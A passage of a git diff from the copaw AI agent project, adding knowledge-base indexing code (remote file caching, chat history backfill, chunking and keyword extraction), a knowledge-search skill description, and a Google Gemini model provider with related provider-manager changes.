".join(parts) + # Compact whitespace + snippet = re.sub(r"\s+", " ", snippet).strip() + return snippet[:max_chars] + + @staticmethod + def _block_to_dict(block: Any) -> dict[str, Any] | None: + if isinstance(block, dict): + return block + if hasattr(block, "model_dump"): + return block.model_dump() + if hasattr(block, "dict"): + return block.dict() + return None + + def _iter_message_blocks(self, messages: list[Any]) -> list[dict[str, Any]]: + blocks: list[dict[str, Any]] = [] + for message in messages: + content = getattr(message, "content", None) + if isinstance(message, dict): + content = message.get("content") + if isinstance(content, str): + blocks.append({"type": "text", "text": content}) + continue + if not isinstance(content, list): + continue + for block in content: + payload = self._block_to_dict(block) + if payload is not None: + blocks.append(payload) + return blocks + + def _iter_message_texts(self, messages: list[Any]) -> list[tuple[str, str]]: + texts: list[tuple[str, str]] = [] + for message in messages: + role = getattr(message, "role", None) + if isinstance(message, dict): + role = message.get("role") + role = role or "assistant" + if isinstance(message, dict) and message.get("type") in { + "plugin_call", + "plugin_call_output", + }: + continue + content = getattr(message, "content", None) + if isinstance(message, dict): + content = message.get("content") + if isinstance(content, str): + texts.append((role, content)) + continue + if not isinstance(content, list): + continue + joined: list[str] = [] + for block in content: + payload = self._block_to_dict(block) + if not payload or payload.get("type") != "text": + continue + text = payload.get("text") + if isinstance(text, str) and text.strip(): + joined.append(text) + if joined: + texts.append((role, "\n".join(joined))) + return texts + + def _extract_text_from_runtime_message(self, message: dict[str, Any]) -> str: + content = message.get("content") + if isinstance(content, str): + return 
self._normalize_text(content) + if not isinstance(content, list): + return "" + snippets: list[str] = [] + for block in content: + if not isinstance(block, dict): + continue + if block.get("type") == "text": + text = block.get("text") + if isinstance(text, str) and text.strip(): + snippets.append(text) + return self._normalize_text("\n".join(snippets)) + + @staticmethod + def _file_reference_from_block(block: dict[str, Any]) -> str: + for key in ("file_url", "path", "url"): + value = block.get(key) + if isinstance(value, str) and value.strip(): + return value.strip() + source = block.get("source") + if isinstance(source, dict): + value = source.get("url") or source.get("path") + if isinstance(value, str) and value.strip(): + return value.strip() + return "" + + def _materialize_file_reference( + self, + file_ref: str, + filename: str, + config: KnowledgeConfig, + ) -> Path | None: + parsed = urlparse(file_ref) + if parsed.scheme in {"", "file"}: + local_value = parsed.path if parsed.scheme == "file" else file_ref + path = Path(local_value).expanduser() + if path.exists() and path.is_file(): + return path.resolve() + return None + + if parsed.scheme in {"http", "https"}: + downloaded_name = Path(parsed.path).name or filename + return self._download_remote_file_with_cache( + file_ref, + downloaded_name, + config, + ) + return None + + def _download_remote_file_with_cache( + self, + url: str, + filename: str, + config: KnowledgeConfig, + ) -> Path | None: + url_key = hashlib.sha1(url.encode("utf-8")).hexdigest() + meta_path = self.remote_meta_dir / f"{url_key}.json" + now = datetime.now(UTC) + metadata: dict[str, Any] = {} + + if meta_path.exists(): + metadata = self._load_json(meta_path) + cached_path = metadata.get("file_path") + if isinstance(cached_path, str) and cached_path: + cached_file = Path(cached_path) + if cached_file.exists() and cached_file.is_file(): + return cached_file + next_retry_at = self._parse_iso_utc(metadata.get("next_retry_at")) + if 
next_retry_at is not None and next_retry_at > now: + return None + + try: + response = httpx.get(url, timeout=15.0, follow_redirects=True) + response.raise_for_status() + content = response.content + if len(content) > config.index.max_file_size: + self._save_remote_meta( + meta_path, + { + "url": url, + "status": "failed", + "last_error": "file too large", + "fail_count": 1, + "next_retry_at": ( + now + timedelta(seconds=30) + ).isoformat(), + "updated_at": now.isoformat(), + }, + ) + return None + + content_hash = hashlib.sha1(content).hexdigest() + blob_dir = self.remote_blob_dir / content_hash + blob_dir.mkdir(parents=True, exist_ok=True) + safe_name = self._safe_name(Path(filename).name) + blob_path = blob_dir / safe_name + if not blob_path.exists(): + blob_path.write_bytes(content) + + self._save_remote_meta( + meta_path, + { + "url": url, + "status": "ok", + "content_hash": content_hash, + "file_path": str(blob_path), + "file_name": safe_name, + "fail_count": 0, + "next_retry_at": None, + "updated_at": now.isoformat(), + }, + ) + return blob_path + except Exception as exc: + fail_count = int(metadata.get("fail_count", 0)) + 1 + backoff_seconds = min(300, 5 * (2 ** (fail_count - 1))) + self._save_remote_meta( + meta_path, + { + "url": url, + "status": "failed", + "last_error": str(exc), + "fail_count": fail_count, + "next_retry_at": ( + now + timedelta(seconds=backoff_seconds) + ).isoformat(), + "updated_at": now.isoformat(), + }, + ) + return None + + @staticmethod + def _save_remote_meta(path: Path, payload: dict[str, Any]) -> None: + path.write_text( + json.dumps(payload, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + + @staticmethod + def _parse_iso_utc(value: Any) -> datetime | None: + if not isinstance(value, str) or not value: + return None + text = value.strip() + if text.endswith("Z"): + text = text[:-1] + "+00:00" + try: + parsed = datetime.fromisoformat(text) + except ValueError: + return None + if parsed.tzinfo is None: + return 
parsed.replace(tzinfo=UTC) + return parsed.astimezone(UTC) + + def _history_backfill_signature(self, running_config: Any | None) -> str: + payload = { + "knowledge_auto_collect_chat_files": bool( + getattr(running_config, "knowledge_auto_collect_chat_files", False), + ), + "knowledge_auto_collect_chat_urls": bool( + getattr(running_config, "knowledge_auto_collect_chat_urls", True), + ), + "knowledge_auto_collect_long_text": bool( + getattr(running_config, "knowledge_auto_collect_long_text", False), + ), + "knowledge_long_text_min_chars": int( + getattr(running_config, "knowledge_long_text_min_chars", 2000), + ), + "knowledge_chunk_size": int( + getattr(running_config, "knowledge_chunk_size", 1200), + ), + "version": 2, + } + return hashlib.sha1( + json.dumps(payload, sort_keys=True, ensure_ascii=False).encode("utf-8"), + ).hexdigest() + + @staticmethod + def _resolve_chunk_size( + config: KnowledgeConfig, + running_config: Any | None, + ) -> int: + chunk_size = getattr(running_config, "knowledge_chunk_size", None) + if isinstance(chunk_size, int): + return chunk_size + return config.index.chunk_size + + def history_backfill_status(self) -> dict[str, Any]: + """Return whether historical chat data still needs knowledge backfill.""" + state = self._load_backfill_state() + has_backfill_record = bool(state) + backfill_completed = bool(state.get("completed")) + + chats_path = self.working_dir / CHATS_FILE + history_chat_count = 0 + if chats_path.exists(): + try: + payload = self._load_json(chats_path) + chats = payload.get("chats", []) + history_chat_count = sum( + 1 + for chat in chats + if str(chat.get("session_id", "") or "").strip() + ) + except Exception: + history_chat_count = 0 + + marked_unbackfilled = not backfill_completed + has_pending_history = marked_unbackfilled and history_chat_count > 0 + return { + "has_backfill_record": has_backfill_record, + "backfill_completed": backfill_completed, + "marked_unbackfilled": marked_unbackfilled, + "history_chat_count": 
history_chat_count, + "has_pending_history": has_pending_history, + "progress": self.get_history_backfill_progress(), + } + + def get_history_backfill_progress(self) -> dict[str, Any]: + payload = self._load_backfill_progress_state() + return { + "running": bool(payload.get("running")), + "completed": bool(payload.get("completed")), + "failed": bool(payload.get("failed")), + "total_sessions": int(payload.get("total_sessions", 0) or 0), + "traversed_sessions": int(payload.get("traversed_sessions", 0) or 0), + "processed_sessions": int(payload.get("processed_sessions", 0) or 0), + "current_session_id": payload.get("current_session_id"), + "error": payload.get("error"), + "updated_at": payload.get("updated_at"), + "reason": payload.get("reason"), + } + + def _load_backfill_state(self) -> dict[str, Any]: + if not self.backfill_state_path.exists(): + return {} + try: + return self._load_json(self.backfill_state_path) + except Exception: + return {} + + def _save_backfill_state(self, payload: dict[str, Any]) -> None: + self.backfill_state_path.write_text( + json.dumps(payload, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + + def _load_backfill_progress_state(self) -> dict[str, Any]: + if not self.backfill_progress_path.exists(): + return {} + try: + return self._load_json(self.backfill_progress_path) + except Exception: + return {} + + def _save_backfill_progress(self, payload: dict[str, Any]) -> None: + self.backfill_progress_path.write_text( + json.dumps(payload, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + + def _remote_source_status(self, source: KnowledgeSourceSpec) -> dict[str, Any]: + remote_hash = "" + for tag in source.tags or []: + if tag.startswith("remote:url_hash:"): + remote_hash = tag.split(":", 2)[-1] + break + if not remote_hash: + return {} + + meta_path = self.remote_meta_dir / f"{remote_hash}.json" + if not meta_path.exists(): + return { + "remote_status": "unknown", + "remote_cache_state": "missing", + "remote_fail_count": 0, + 
"remote_next_retry_at": None, + "remote_last_error": None, + "remote_updated_at": None, + } + + payload = self._load_json(meta_path) + remote_status = payload.get("status", "unknown") + fail_count = int(payload.get("fail_count", 0) or 0) + next_retry_at = payload.get("next_retry_at") + next_retry_dt = self._parse_iso_utc(next_retry_at) + now = datetime.now(UTC) + + if remote_status == "ok": + if source.location and Path(source.location).exists(): + cache_state = "cached" + else: + cache_state = "missing" + elif remote_status == "failed": + if next_retry_dt is not None and next_retry_dt > now: + cache_state = "waiting_retry" + else: + cache_state = "ready_retry" + else: + cache_state = "unknown" + + return { + "remote_status": remote_status, + "remote_cache_state": cache_state, + "remote_fail_count": fail_count, + "remote_next_retry_at": next_retry_at, + "remote_last_error": payload.get("last_error"), + "remote_updated_at": payload.get("updated_at"), + } + + def _upsert_source( + self, + config: KnowledgeConfig, + source: KnowledgeSourceSpec, + ) -> bool: + normalized = self._source_with_auto_name(source, config) + for index, existing in enumerate(config.sources): + if existing.id != normalized.id: + continue + existing_normalized = self._source_with_auto_name(existing, config) + if existing_normalized.model_dump(mode="json") == normalized.model_dump(mode="json"): + return False + config.sources[index] = normalized + return True + config.sources.append(normalized) + return True + + def _source_with_auto_name( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> KnowledgeSourceSpec: + updates: dict[str, Any] = {} + source_for_title = source + + if not (source.summary or "").strip(): + generated_summary = self._generate_source_summary(source, config) + if generated_summary: + updates["summary"] = generated_summary + source_for_title = source.model_copy( + update={"summary": generated_summary} + ) + + generated = 
self._generate_source_name(source_for_title, config) + if source.name != generated: + updates["name"] = generated + + if not updates: + return source + return source.model_copy(update=updates) + + def _generate_source_summary( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + semantic = self._semantic_summary_for_source(source, config) + if semantic: + keywords = self._semantic_keywords_for_source(source, config) + if keywords: + summary_with_keywords = ( + f"{semantic} 关键词: {', '.join(keywords)}" + ) + return self._truncate_summary(summary_with_keywords) + return self._truncate_summary(semantic) + + if source.type == "url": + url = (source.location or "").strip() + if url: + parsed = urlparse(url) + host = parsed.netloc or url + path = parsed.path.strip("/") + tail = path.split("/")[-1] if path else "" + if tail: + return self._truncate_summary(f"{host}/{tail}") + return self._truncate_summary(host) + + if source.type in {"file", "directory"} and source.location: + location = (source.location or "").strip() + if location: + return self._truncate_summary(Path(location).name or location) + + if source.name: + return self._truncate_summary(source.name) + return "" + + def _semantic_summary_for_source( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + processed = self._process_source_knowledge(source, config) + return processed.get("summary", "") + + def _generate_source_name( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + semantic = self._semantic_subject_for_source(source, config) + if semantic: + return self._truncate_title(semantic) + + if source.type == "url": + url = (source.location or "").strip() + if url: + parsed = urlparse(url) + host = parsed.netloc or url + path = parsed.path.strip("/") + tail = path.split("/")[-1] if path else "" + if tail: + return self._truncate_title(f"{host}/{tail}") + return 
self._truncate_title(host) + + if source.type in {"file", "directory"} and source.location: + location = (source.location or "").strip() + if location: + return self._truncate_title(Path(location).name or location) + + return self._truncate_title(source.id) + + def _semantic_subject_for_source( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + processed = self._process_source_knowledge(source, config) + return processed.get("subject", "") + + def _semantic_keywords_for_source( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + top_n: int = _KEYWORD_DEFAULT_TOP_N, + ) -> list[str]: + processed = self._process_source_knowledge(source, config, top_n=top_n) + return processed.get("keywords", []) + + def _process_source_knowledge( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + top_n: int = _KEYWORD_DEFAULT_TOP_N, + ) -> dict[str, Any]: + candidates = self._collect_source_processing_candidates(source, config) + merged = self._normalize_text("\n".join(part for part in candidates if part)) + processed = self._process_knowledge_text(merged, top_n=top_n) + + # Keep deterministic priority for subjects: summary > content > index/title. 
+ for candidate in candidates: + subject = self._extract_subject_from_text(candidate) + if subject: + processed["subject"] = subject + break + return processed + + def _process_knowledge_text( + self, + text: str, + top_n: int = _KEYWORD_DEFAULT_TOP_N, + ) -> dict[str, Any]: + normalized = self._normalize_text(text or "") + if not normalized: + return { + "subject": "", + "summary": "", + "keywords": [], + } + + return { + "subject": self._extract_subject_from_text(normalized), + "summary": self._extract_summary_from_text(normalized), + "keywords": self._extract_keywords_from_text(normalized, top_n=top_n), + } + + def _collect_source_processing_text( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> str: + candidates = self._collect_source_processing_candidates(source, config) + return self._normalize_text("\n".join(part for part in candidates if part)) + + def _collect_source_processing_candidates( + self, + source: KnowledgeSourceSpec, + config: KnowledgeConfig | None = None, + ) -> list[str]: + candidates: list[str] = [] + + if source.summary and source.summary.strip(): + candidates.append(source.summary) + if source.content and source.content.strip(): + candidates.append(source.content) + + indexed_payload = self._load_index_payload_safe(source.id) + if indexed_payload: + chunk_titles: list[str] = [] + chunk_texts: list[str] = [] + for chunk in indexed_payload.get("chunks", []): + if not isinstance(chunk, dict): + continue + chunk_title = chunk.get("document_title") + if isinstance(chunk_title, str) and chunk_title.strip(): + chunk_titles.append(chunk_title) + chunk_text = chunk.get("text") + if isinstance(chunk_text, str) and chunk_text.strip(): + chunk_texts.append(chunk_text) + + if chunk_titles: + candidates.append("\n".join(chunk_titles)) + if chunk_texts: + candidates.append("\n".join(chunk_texts)) + + location = (source.location or "").strip() + if source.type == "file" and location: + full_text = 
self._read_local_text(Path(location)) + if full_text: + candidates.append(full_text) + elif source.type == "directory" and location: + full_text = self._read_directory_text(Path(location), config) + if full_text: + candidates.append(full_text) + + return candidates + + def _read_local_text(self, path: Path) -> str: + try: + resolved = path.expanduser().resolve() + if not resolved.exists() or not resolved.is_file(): + return "" + raw = resolved.read_text(encoding="utf-8", errors="ignore") + return self._normalize_text(raw) + except Exception: + return "" + + def _read_directory_text( + self, + directory: Path, + config: KnowledgeConfig | None = None, + ) -> str: + try: + root = directory.expanduser().resolve() + if not root.exists() or not root.is_dir(): + return "" + parts: list[str] = [] + for path in root.rglob("*"): + if not path.is_file(): + continue + if config is not None: + relative = path.relative_to(root).as_posix() + if not self._is_allowed_path(relative, config): + continue + text = self._read_local_text(path) + if text: + parts.append(text) + return self._normalize_text("\n".join(parts)) + except Exception: + return "" + + def _load_index_payload_safe(self, source_id: str) -> dict[str, Any] | None: + index_path = self._source_index_path(source_id) + if not index_path.exists(): + return None + try: + return self._load_json(index_path) + except Exception: + return None + + def _read_local_text_snippet(self, path: Path, max_chars: int = 2400) -> str: + try: + resolved = path.expanduser().resolve() + if not resolved.exists() or not resolved.is_file(): + return "" + raw = resolved.read_text(encoding="utf-8", errors="ignore") + return self._normalize_text(raw[:max_chars]) + except Exception: + return "" + + def _read_directory_text_snippet(self, directory: Path, max_chars: int = 2400) -> str: + try: + root = directory.expanduser().resolve() + if not root.exists() or not root.is_dir(): + return "" + for path in root.rglob("*"): + if not path.is_file(): + 
continue + snippet = self._read_local_text_snippet(path, max_chars=max_chars) + if snippet: + return snippet + except Exception: + return "" + return "" + + def _semantic_title_from_text(self, text: str) -> str: + normalized = self._normalize_text(text or "") + if not normalized: + return "" + + sentences = [ + s.strip(" \t-::;;,.。!?!?") + for s in _TITLE_SENTENCE_SPLIT_RE.split(normalized) + if s.strip() + ] + if not sentences: + return "" + + token_freq: dict[str, int] = {} + sentence_tokens: list[list[str]] = [] + for sentence in sentences: + tokens = self._tokenize_text(sentence) + sentence_tokens.append(tokens) + for token in tokens: + token_freq[token] = token_freq.get(token, 0) + 1 + + best_sentence = "" + best_score = -1.0 + for sentence, tokens in zip(sentences, sentence_tokens): + if not tokens: + score = 0.0 + else: + unique_score = sum(token_freq.get(token, 0) for token in set(tokens)) + score = unique_score / (len(tokens) ** 0.5) + if score > best_score: + best_score = score + best_sentence = sentence + + if not best_sentence: + best_sentence = sentences[0] + return self._normalize_text(best_sentence) + + def _extract_subject_from_text(self, text: str) -> str: + return self._semantic_title_from_text(text) + + def _extract_summary_from_text(self, text: str) -> str: + # Keep the summary extractor independent for future tuning. 
+ return self._semantic_title_from_text(text) + + @staticmethod + def _tokenize_text(text: str) -> list[str]: + normalized = re.sub(r"\s+", " ", (text or "").strip()) + if not normalized: + return [] + + raw_tokens: list[str] = [] + + if jieba is not None: + try: + raw_tokens = [str(tok) for tok in jieba.lcut(normalized)] + except Exception: + raw_tokens = [] + elif hanlp is not None: + for attr in ("tokenize", "tok"): + fn = getattr(hanlp, attr, None) + if not callable(fn): + continue + try: + result = fn(normalized) + if isinstance(result, list): + raw_tokens = [str(tok) for tok in result] + elif isinstance(result, tuple): + raw_tokens = [str(tok) for tok in result] + if raw_tokens: + break + except Exception: + continue + + if not raw_tokens: + raw_tokens = _SEMANTIC_TOKEN_RE.findall(normalized) + + tokens: list[str] = [] + for raw in raw_tokens: + token = str(raw).strip().lower() + if not token: + continue + if not _SEMANTIC_TOKEN_RE.fullmatch(token): + continue + if token in _SEMANTIC_STOP_WORDS: + continue + tokens.append(token) + return tokens + + def _extract_keywords_from_text(self, text: str, top_n: int = 3) -> list[str]: + tokens = self._tokenize_text(text) + if not tokens or top_n <= 0: + return [] + + freq = Counter(tokens) + ranked = sorted(freq.items(), key=lambda item: (-item[1], item[0])) + return [token for token, _ in ranked[:top_n]] + + @staticmethod + def _truncate_title(value: str, max_len: int = 120) -> str: + compact = re.sub(r"\s+", " ", (value or "").strip()) + if not compact: + compact = "knowledge" + if len(compact) <= max_len: + return compact + return compact[: max_len - 3].rstrip() + "..." + + @staticmethod + def _truncate_summary(value: str, max_len: int = 180) -> str: + compact = re.sub(r"\s+", " ", (value or "").strip()) + if not compact: + return "" + if len(compact) <= max_len: + return compact + return compact[: max_len - 3].rstrip() + "..." 
+ + @staticmethod + def _chunk_documents( + documents: list[dict[str, str]], + chunk_size: int, + ) -> list[dict[str, Any]]: + chunks: list[dict[str, Any]] = [] + for document in documents: + text = document["text"] + if not text: + continue + for index, start in enumerate(range(0, len(text), chunk_size)): + chunk_text = text[start : start + chunk_size] + if not chunk_text.strip(): + continue + chunks.append( + { + "chunk_id": f"{document['path']}::{index}", + "document_path": document["path"], + "document_title": document["title"], + "text": chunk_text, + }, + ) + return chunks + + @staticmethod + def _score_chunk(text: str, terms: list[str]) -> int: + lowered = text.lower() + score = 0 + phrase = " ".join(terms) + if phrase and phrase in lowered: + score += len(terms) + 2 + for term in terms: + score += lowered.count(term) + return score + + @staticmethod + def _build_snippet(text: str, terms: list[str], length: int = 240) -> str: + lowered = text.lower() + position = 0 + for term in terms: + found = lowered.find(term) + if found >= 0: + position = found + break + start = max(position - 60, 0) + end = min(start + length, len(text)) + return text[start:end].strip() + + @staticmethod + def _is_allowed_path(relative_path: str, config: KnowledgeConfig) -> bool: + normalized = relative_path.strip("/") + if any( + fnmatch.fnmatch(normalized, pattern) + for pattern in config.index.exclude_globs + ): + return False + if not config.index.include_globs: + return True + return any( + fnmatch.fnmatch(normalized, pattern) + or fnmatch.fnmatch(f"./{normalized}", pattern) + for pattern in config.index.include_globs + ) + + @staticmethod + def _safe_name(value: str) -> str: + safe = re.sub(r"[^A-Za-z0-9._-]+", "-", value).strip("-.") + return safe or "knowledge" + + @staticmethod + def _session_filename(session_id: str, user_id: str) -> str: + safe_sid = _sanitize_filename(session_id) + safe_uid = _sanitize_filename(user_id) if user_id else "" + if safe_uid: + return 
f"{safe_uid}_{safe_sid}.json" + return f"{safe_sid}.json" \ No newline at end of file diff --git a/src/copaw/knowledge/module_skills.py b/src/copaw/knowledge/module_skills.py new file mode 100644 index 000000000..3d8a487f9 --- /dev/null +++ b/src/copaw/knowledge/module_skills.py @@ -0,0 +1,23 @@ +# -*- coding: utf-8 -*- + +from pathlib import Path + +from ..agents.skills_manager import SkillService, sync_skill_dir_to_active + + +KNOWLEDGE_MODULE_SKILLS_DIR = Path(__file__).parent / "skills" +KNOWLEDGE_MODULE_SKILL_NAMES = ("knowledge_search_assistant",) + + +def sync_knowledge_module_skills(enabled: bool) -> None: + """Keep knowledge module skills aligned with the runtime enabled state.""" + for skill_name in KNOWLEDGE_MODULE_SKILL_NAMES: + if enabled: + skill_dir = KNOWLEDGE_MODULE_SKILLS_DIR / skill_name + if not sync_skill_dir_to_active(skill_dir, force=True): + raise RuntimeError( + f"Failed to enable knowledge module skill: {skill_name}" + ) + continue + + SkillService.disable_skill(skill_name) \ No newline at end of file diff --git a/src/copaw/knowledge/skills/knowledge_search_assistant/SKILL.md b/src/copaw/knowledge/skills/knowledge_search_assistant/SKILL.md new file mode 100644 index 000000000..448d481ab --- /dev/null +++ b/src/copaw/knowledge/skills/knowledge_search_assistant/SKILL.md @@ -0,0 +1,42 @@ +--- +name: knowledge_search_assistant +description: "Use knowledge_search proactively when the user is asking about existing project facts, process notes, prior decisions, archived materials, or whether the knowledge base already contains something relevant." +metadata: + { + "copaw": + { + "emoji": ":books:", + "requires": {} + } + } +--- + +# Knowledge Search Assistant + +Use this skill when the user's question is likely answered by existing knowledge base content. Prefer checking knowledge_search before answering from memory. + +## Trigger Signals + +- The user asks whether the knowledge base, docs, or prior notes already contain something. 
+- The user is asking for established project facts, conventions, workflows, or historical decisions.
+- The user is requesting grounded recall rather than fresh synthesis.
+
+## Suggested Flow
+
+1. Extract a short search phrase from the user's request.
+2. Call knowledge_search with the original question or a shorter query.
+3. If the first search is weak, retry once with fewer keywords.
+4. Answer from the retrieved evidence when available.
+5. If nothing useful is found, say that no relevant knowledge was found.
+
+## Response Rules
+
+- Treat search hits as evidence and summarize them accurately.
+- Do not present guesses as stored facts.
+- If the user asks "do we already have this", report the retrieval result first.
+
+## Do Not Use
+
+- Pure code editing, debugging, testing, or build tasks that need direct workspace inspection rather than knowledge retrieval.
+- General conversation that clearly does not depend on stored knowledge.
+- Cases where the user explicitly says not to use the knowledge base.
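The retry step in the Suggested Flow above (search once, then retry with fewer keywords if the first result is weak) can be sketched roughly as follows. `search_fn` is a placeholder standing in for the knowledge_search tool call, and its signature and the keyword-trimming heuristic are assumptions for illustration.

```python
# Rough sketch of steps 2-3 of the flow above. `search_fn` is a
# hypothetical stand-in for the knowledge_search tool; real call
# signatures may differ.
def search_with_retry(search_fn, query: str, min_hits: int = 1) -> list:
    hits = search_fn(query)
    if len(hits) >= min_hits:
        return hits
    # Weak first result: retry once with fewer keywords (keep the
    # three longest terms, which tend to carry the most signal).
    terms = sorted(query.split(), key=len, reverse=True)[:3]
    retry_query = " ".join(terms)
    if retry_query and retry_query != query:
        return search_fn(retry_query)
    return hits
```

The single-retry cap mirrors the flow's "retry once" rule; if the trimmed query is identical to the original, there is nothing new to try and the first (empty) result is returned as-is.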
diff --git a/src/copaw/providers/gemini_provider.py b/src/copaw/providers/gemini_provider.py new file mode 100644 index 000000000..9788678ba --- /dev/null +++ b/src/copaw/providers/gemini_provider.py @@ -0,0 +1,130 @@ +# -*- coding: utf-8 -*- +"""A Google Gemini provider implementation using AgentScope's native +GeminiChatModel.""" + +from __future__ import annotations + +from typing import Any, List + +from agentscope.model import ChatModelBase +from google import genai +from google.genai import errors as genai_errors +from google.genai import types as genai_types + +from copaw.providers.provider import ModelInfo, Provider + + +class GeminiProvider(Provider): + """Provider implementation for Google Gemini API.""" + + def _client(self, timeout: float = 10) -> Any: + return genai.Client( + api_key=self.api_key, + http_options=genai_types.HttpOptions(timeout=int(timeout * 1000)), + ) + + @staticmethod + def _normalize_models_payload(payload: Any) -> List[ModelInfo]: + models: List[ModelInfo] = [] + for row in payload or []: + model_id = str(getattr(row, "name", "") or "").strip() + + if not model_id: + continue + + # Gemini API returns model names like "models/gemini-2.5-flash" + # Strip the "models/" prefix for cleaner IDs + if model_id.startswith("models/"): + model_id = model_id[len("models/") :] + + display_name = str( + getattr(row, "display_name", "") or model_id, + ).strip() + + if not display_name or display_name.startswith("models/"): + display_name = model_id + + models.append(ModelInfo(id=model_id, name=display_name)) + + deduped: List[ModelInfo] = [] + seen: set[str] = set() + for model in models: + if model.id in seen: + continue + seen.add(model.id) + deduped.append(model) + return deduped + + async def check_connection(self, timeout: float = 10) -> tuple[bool, str]: + """Check if Google Gemini provider is reachable.""" + try: + client = self._client(timeout=timeout) + # Use the async list models endpoint to verify connectivity + async for _ in await 
client.aio.models.list(): + break + return True, "" + except genai_errors.APIError: + return ( + False, + "Failed to connect to Google Gemini API. " + "Check your API key.", + ) + except Exception: + return ( + False, + "Unknown exception when connecting to Google Gemini API.", + ) + + async def fetch_models(self, timeout: float = 10) -> List[ModelInfo]: + """Fetch available models from Gemini API.""" + try: + client = self._client(timeout=timeout) + payload = [] + async for model in await client.aio.models.list(): + payload.append(model) + models = self._normalize_models_payload(payload) + return models + except genai_errors.APIError: + return [] + except Exception: + return [] + + async def check_model_connection( + self, + model_id: str, + timeout: float = 10, + ) -> tuple[bool, str]: + """Check if a specific Gemini model is reachable/usable.""" + target = (model_id or "").strip() + if not target: + return False, "Empty model ID" + + try: + client = self._client(timeout=timeout) + response = await client.aio.models.generate_content_stream( + model=target, + contents="ping", + ) + async for _ in response: + break + return True, "" + except genai_errors.APIError: + return ( + False, + f"Model '{model_id}' is not reachable or usable", + ) + except Exception: + return ( + False, + f"Unknown exception when connecting to model '{model_id}'", + ) + + def get_chat_model_instance(self, model_id: str) -> ChatModelBase: + from agentscope.model import GeminiChatModel + + return GeminiChatModel( + model_name=model_id, + stream=True, + api_key=self.api_key, + generate_kwargs=self.generate_kwargs, + ) diff --git a/src/copaw/providers/ollama_provider.py b/src/copaw/providers/ollama_provider.py index 159960671..893f46ad1 100644 --- a/src/copaw/providers/ollama_provider.py +++ b/src/copaw/providers/ollama_provider.py @@ -22,7 +22,7 @@ class OllamaProvider(Provider): def model_post_init(self, __context: Any) -> None: if not self.base_url: # type: ignore self.base_url = ( - 
os.environ.get("OLLAMA_HOST") or "http://localhost:11434" + os.environ.get("OLLAMA_HOST") or "http://127.0.0.1:11434" ) if self.base_url.endswith("/v1"): # For backwards compatibility, if the URL ends with /v1, @@ -76,10 +76,10 @@ async def check_connection(self, timeout: float = 5) -> tuple[bool, str]: return False, "Ollama Python SDK is not installed" except ConnectionError: return False, f"Failed to connect to Ollama at `{self.base_url}`" - except Exception: + except Exception as exc: return ( False, - f"Unknown exception when connecting to `{self.base_url}`", + f"Failed to connect to Ollama at `{self.base_url}`: {exc}", ) async def fetch_models(self, timeout: float = 5) -> List[ModelInfo]: @@ -113,8 +113,8 @@ async def check_model_connection( return False, "Ollama Python SDK is not installed" except ConnectionError: return False, f"Failed to connect to Ollama at `{self.base_url}`" - except Exception: - return False, f"Unknown exception when connecting to `{target}`" + except Exception as exc: + return False, f"Model connection failed for `{target}`: {exc}" async def add_model( self, diff --git a/src/copaw/providers/provider_manager.py b/src/copaw/providers/provider_manager.py index 62a329c1b..3571aac47 100644 --- a/src/copaw/providers/provider_manager.py +++ b/src/copaw/providers/provider_manager.py @@ -9,7 +9,7 @@ import logging import json -from pydantic import BaseModel, Field +from pydantic import BaseModel from agentscope.model import ChatModelBase @@ -19,8 +19,10 @@ Provider, ProviderInfo, ) +from copaw.providers.models import ModelSlotConfig from copaw.providers.openai_provider import OpenAIProvider from copaw.providers.anthropic_provider import AnthropicProvider +from copaw.providers.gemini_provider import GeminiProvider from copaw.providers.ollama_provider import OllamaProvider from copaw.constant import SECRET_DIR from copaw.local_models import create_local_chat_model @@ -97,6 +99,19 @@ ANTHROPIC_MODELS: List[ModelInfo] = [] +GEMINI_MODELS: 
List[ModelInfo] = [ + ModelInfo(id="gemini-3.1-pro-preview", name="Gemini 3.1 Pro Preview"), + ModelInfo(id="gemini-3-flash-preview", name="Gemini 3 Flash Preview"), + ModelInfo( + id="gemini-3.1-flash-lite-preview", + name="Gemini 3.1 Flash Lite Preview", + ), + ModelInfo(id="gemini-2.5-pro", name="Gemini 2.5 Pro"), + ModelInfo(id="gemini-2.5-flash", name="Gemini 2.5 Flash"), + ModelInfo(id="gemini-2.5-flash-lite", name="Gemini 2.5 Flash Lite"), + ModelInfo(id="gemini-2.0-flash", name="Gemini 2.0 Flash"), +] + PROVIDER_MODELSCOPE = OpenAIProvider( id="modelscope", name="ModelScope", @@ -183,6 +198,17 @@ freeze_url=True, ) +PROVIDER_GEMINI = GeminiProvider( + id="gemini", + name="Google Gemini", + base_url="https://generativelanguage.googleapis.com", + api_key_prefix="", + models=GEMINI_MODELS, + chat_model="GeminiChatModel", + freeze_url=True, + support_model_discovery=True, +) + PROVIDER_OLLAMA = OllamaProvider( id="ollama", name="Ollama", @@ -202,17 +228,6 @@ ) -class ModelSlotConfig(BaseModel): - provider_id: str = Field( - ..., - description="ID of the provider to use for this model slot", - ) - model: str = Field( - ..., - description="ID of the model to use for this model slot", - ) - - class ActiveModelsInfo(BaseModel): active_llm: ModelSlotConfig | None @@ -259,6 +274,7 @@ def _init_builtins(self): self._add_builtin(PROVIDER_MINIMAX) self._add_builtin(PROVIDER_DEEPSEEK) self._add_builtin(PROVIDER_ANTHROPIC) + self._add_builtin(PROVIDER_GEMINI) self._add_builtin(PROVIDER_OLLAMA) self._add_builtin(PROVIDER_LMSTUDIO) self._add_builtin(PROVIDER_LLAMACPP) @@ -469,6 +485,8 @@ def _provider_from_data(self, data: Dict) -> Provider: if provider_id == "anthropic" or chat_model == "AnthropicChatModel": return AnthropicProvider.model_validate(data) + if provider_id == "gemini" or chat_model == "GeminiChatModel": + return GeminiProvider.model_validate(data) if provider_id == "ollama": return OllamaProvider.model_validate(data) if data.get("is_local", False): diff --git 
